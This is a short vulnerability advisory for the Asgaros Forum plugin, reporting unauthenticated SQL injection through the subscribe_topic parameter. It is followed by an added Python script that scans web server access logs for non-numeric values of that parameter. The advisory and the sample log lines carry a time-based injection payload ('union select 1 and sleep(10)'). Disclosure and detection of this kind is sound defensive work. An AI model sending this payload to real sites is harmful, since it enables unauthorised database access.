The plugin does not validate or escape user input when subscribing to a topic before using it in a SQL statement, leading to an unauthenticated SQL injection issue.
https://example.com/forum/?subscribe_topic=1 union select 1 and sleep(10)
CPE

Name | Operator | Version |
---|---|---|
asgaros-forum | lt | 1.15.13 |
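
A log check for this issue, as an added example that is not part of the original advisory or the plugin's code: it flags requests whose `subscribe_topic` value is not a plain decimal ID. It assumes topic IDs are decimal integers and that the web server writes combined-format access logs; the function name and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

PARAM = "subscribe_topic"  # parameter named in the advisory
# Request line of a combined-format log entry; the lazy match also
# captures targets that were logged with raw (unencoded) spaces.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>.+?) HTTP/[\d.]+"')
TOPIC_ID_RE = re.compile(r"[0-9]+")  # assumption: topic IDs are decimal integers

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /forum/?subscribe_topic=12 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] '
    '"GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(10) '
    'HTTP/1.1" 200 512 "-" "curl/8.0"',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /forum/?subscribe_topic=1+union+select+1+and+sleep(10) '
    'HTTP/1.1" 200 512 "-" "curl/8.0"',
    '203.0.113.9 - - [01/Jan/2024:10:00:12 +0000] '
    '"GET /forum/?subscribe_topic=1 union select 1 and sleep(10) '
    'HTTP/1.1" 400 0 "-" "-"',
    '192.0.2.11 - - [01/Jan/2024:10:00:15 +0000] '
    '"GET /forum/?view=topic&id=3 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]


def suspicious_subscribe_requests(log_lines):
    """Return (client_ip, decoded_value) for every request whose
    subscribe_topic value is anything other than a decimal topic ID."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group("target")).query
        # parse_qs percent-decodes values and maps '+' to a space;
        # blank values are kept so an empty parameter is flagged too.
        values = parse_qs(query, keep_blank_values=True).get(PARAM, [])
        client_ip = line.split(" ", 1)[0]
        for value in values:
            if not TOPIC_ID_RE.fullmatch(value):
                hits.append((client_ip, value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_subscribe_requests(SAMPLE_LOG):
        print(f"{ip}\t{value!r}")
```
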